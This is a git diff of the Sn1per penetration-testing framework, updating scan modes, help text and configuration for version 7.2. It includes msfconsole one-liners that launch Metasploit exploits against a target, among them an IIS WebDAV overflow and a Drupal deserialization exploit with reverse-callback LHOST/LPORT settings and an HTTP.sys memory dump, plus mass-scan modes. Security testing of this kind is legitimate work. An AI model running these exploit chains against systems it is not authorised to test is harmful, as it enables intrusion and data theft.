"s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw + msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg SSL false; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw + msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" @@ -80,6 +86,12 @@ sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING MS15-034 HTTP.SYS MEMORY LEAK EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw @@ -193,6 +205,12 @@ msfconsole -q -x "use unix/webapp/drupal_restws_unserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.txt 2> /dev/null rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING JAVA RMI SCANNER $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use auxiliary/scanner/misc/java_rmi_server; setg RHOSTS \"$TARGET\"; set RPORT \"$PORT\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw 2> /dev/null if [ "$SLACK_NOTIFICATIONS" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per webpwn scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" fi diff --git a/modes/webporthttp.sh b/modes/webporthttp.sh index a62e413d..9a64e975 100644 --- a/modes/webporthttp.sh +++ b/modes/webporthttp.sh @@ -14,7 +14,7 @@ if [ "$MODE" = "webporthttp" ]; then mkdir $LOOT_DIR/scans 2> /dev/null mkdir $LOOT_DIR/output 2> /dev/null fi - echo "$TARGET $MODE port$PORT `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt if [ "$SLACK_NOTIFICATIONS" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" diff --git a/modes/webporthttps.sh b/modes/webporthttps.sh index 2995e1ca..a6e079dc 100644 --- a/modes/webporthttps.sh +++ b/modes/webporthttps.sh @@ -14,7 +14,7 @@ if [ "$MODE" = "webporthttps" ]; then mkdir $LOOT_DIR/scans 2> /dev/null mkdir $LOOT_DIR/output 2> /dev/null fi - echo "$TARGET $MODE port$PORT `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt if [ "$SLACK_NOTIFICATIONS" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" diff --git a/modes/webscan.sh b/modes/webscan.sh index 59c072d8..47ffcd4c 100644 --- a/modes/webscan.sh +++ b/modes/webscan.sh @@ -53,14 +53,31 @@ if [ "$MODE" = "webscan" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - if [ "$VERBOSE" == "1" ]; then - echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}\"$RESET" - fi curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}" curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:443\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:443\"]}" - echo "" + echo "" + for a in {1..30}; + do + echo -n "[-] SCAN #$a: " + curl -sI "http://127.0.0.1:1337/v0.1/scan/$a" | grep HTTP | awk '{print $2}' + BURP_STATUS=$(curl -s http://127.0.0.1:1337/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining") + while [[ ${#BURP_STATUS} -gt "5" ]]; + do + BURP_STATUS=$(curl -s http://127.0.0.1:1337/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining") + BURP_STATUS_FULL=$(curl -s http://127.0.0.1:1337/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3) + echo "[i] STATUS: $BURP_STATUS_FULL" + sleep 15 + done + echo "[+] VULNERABILITIES: " + echo "----------------------------------------------------------------" + curl -s "http://127.0.0.1:1337/v0.1/scan/$a" | grep -o -P "name.{1,100}" | cut -d\" -f3 | sort -u | tee $LOOT_DIR/web/burpsuite-$TARGET-$a.txt + done + echo "[-] Done!" fi if [ "$ARACHNI_SCAN" == "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING ARACHNI SCAN $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" mkdir -p $LOOT_DIR/web/http-$TARGET/ mkdir -p $LOOT_DIR/web/https-$TARGET/ arachni --report-save-path=$LOOT_DIR/web/http-$TARGET/ --output-only-positives http://$TARGET | tee $LOOT_DIR/output/sniper-$TARGET-webscan-http-`date +"%Y%m%d%H%M"`.txt 2>&1 diff --git a/sniper b/sniper index 804b175a..48e18bfb 100755 --- a/sniper +++ b/sniper @@ -3,7 +3,7 @@ # + -- --=[https://xerosecurity.com # -VER="7.1" +VER="7.2" INSTALL_DIR="/usr/share/sniper" LOOT_DIR="$INSTALL_DIR/loot/$TARGET" SNIPER_PRO=$INSTALL_DIR/pro.sh @@ -52,9 +52,6 @@ function help { echo ' [*] FULLPORTONLY SCAN MODE' echo ' sniper -t|--target -fp|--fullportonly' echo "" - echo ' [*] PORT SCAN MODE' - echo ' sniper -t|--target -m|--mode port -p|--port ' - echo "" echo ' [*] WEB MODE - PORT 80 + 443 ONLY!' echo ' sniper -t|--target -m|--mode web' echo "" @@ -76,6 +73,21 @@ function help { echo ' [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED' echo ' sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace ' echo "" + echo ' [*] MASS PORT SCAN MODE' + echo ' sniper -f|--file -m|--mode massportscan' + echo "" + echo ' [*] MASS WEB SCAN MODE' + echo ' sniper -f|--file -m|--mode massweb' + echo "" + echo ' [*] MASS WEBSCAN SCAN MODE' + echo ' sniper -f|--file -m|--mode masswebscan' + echo "" + echo ' [*] MASS VULN SCAN MODE' + echo ' sniper -f|--file -m|--mode massvulnscan' + echo "" + echo ' [*] PORT SCAN MODE' + echo ' sniper -t|--target -m|--mode port -p|--port ' + echo "" echo ' [*] LIST WORKSPACES' echo ' sniper --list' echo "" @@ -273,6 +285,7 @@ case $key in read ANS rm -Rf /usr/share/sniper/loot/workspace/$WORKSPACE/ echo "Workspace /usr/share/sniper/loot/workspace/$WORKSPACE/ was removed." + sniper -w default --reimport exit shift # past argument ;; @@ -439,6 +452,9 @@ function loot { echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET" source $INSTALL_DIR/pro.sh $BROWSER $LOOT_DIR/sniper-report.html 2> /dev/null > /dev/null & + elif [ "$SN1PER_AUTOLOAD" = "0" ]; then + echo -e "$OKORANGE + -- --=[Generating Sn1per Professional reports...$RESET" + source $INSTALL_DIR/pro.sh else echo -e "$OKORANGE + -- --=[Do you want to load Sn1per Professional (y or n)? $RESET" read ANS @@ -506,11 +522,16 @@ fi source modes/discover.sh source modes/flyover.sh +source modes/vulnscan.sh source modes/fullportonly.sh source modes/web.sh source modes/webporthttp.sh source modes/webporthttps.sh source modes/webscan.sh +source modes/massweb.sh +source modes/masswebscan.sh +source modes/massvulnscan.sh +source modes/massportscan.sh source modes/stealth.sh source modes/airstrike.sh source modes/nuke.sh diff --git a/sniper.conf b/sniper.conf index e6b76ae7..35901c90 100644 --- a/sniper.conf +++ b/sniper.conf @@ -29,6 +29,13 @@ BROWSER="firefox" BURP_HOST="127.0.0.1" BURP_PORT="1337" +# OPENVAS CONFIG +OPENVAS="1" +OPENVAS_USERNAME="admin" +OPENVAS_PASSWORD="" +OPENVAS_HOST="127.0.0.1" +OPENVAS_PORT="9390" + # METASPLOIT SCANNER CONFIG METASPLOIT_IMPORT="1" MSF_LHOST="127.0.0.1" @@ -38,6 +45,9 @@ MSF_LPORT="4444" CENSYS_APP_ID="" CENSYS_API_SECRET="" +# HUNTER.IO API KEY +HUNTERIO_KEY="" + # SLACK API SLACK_NOTIFICATIONS="1" SLACK_NOTIFICATIONS_THEHARVESTER="0" @@ -78,11 +88,11 @@ SAMRDUMP="$INSTALL_DIR/bin/samrdump.py" INURLBR="$INSTALL_DIR/bin/inurlbr.php" # PORT SCAN CONFIGURATIONS -QUICK_PORTS="21,22,23,25,53,80,110,137,138,139,161,162,443,445,512,513,514,1433,3306,4444,5555,5432,5555,5900,5901,6667,7001,8080,8888,8000,10000" -DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049" -DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535" -DEFAULT_UDP_PORTS="53,67,68,69,88,123,161,162,137,138,139,389,520,2049" -FULL_PORTSCAN_PORTS="1-65535" +QUICK_PORTS="21,22,23,25,53,80,110,137,138,139,161,162,443,445,512,513,514,1099,1433,3306,4444,5555,5432,5555,5900,5901,6093,6095,6667,7001,8080,8888,8000,10000,49180" +DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2780,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6093,6095,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8009,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8983,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9876,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,49180,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:500,U:520,U:2049" +DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2780,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6093,6095,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8009,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8983,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9876,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,49180,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535" +DEFAULT_UDP_PORTS="53,67,68,69,88,123,161,162,137,138,139,389,500,520,2049" +FULL_PORTSCAN_PORTS="T:1-65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:500,U:520,U:2049" THREADS="30" @@ -106,6 +116,7 @@ GOOHAK="1" INURLBR="1" THEHARVESTER="1" METAGOOFIL="1" +HUNTERIO="0" # ACTIVE WEB PLUGINS BURP_SCAN="1" @@ -149,6 +160,6 @@ DNSCAN="1" CRTSH="1" SUBOVER="1" PROJECT_SONAR="1" -CENSYS_SUBDOMAINS="1" +CENSYS_SUBDOMAINS="0" SUBNET_RETRIEVAL="1" SUBJACK="1" \ No newline at end of file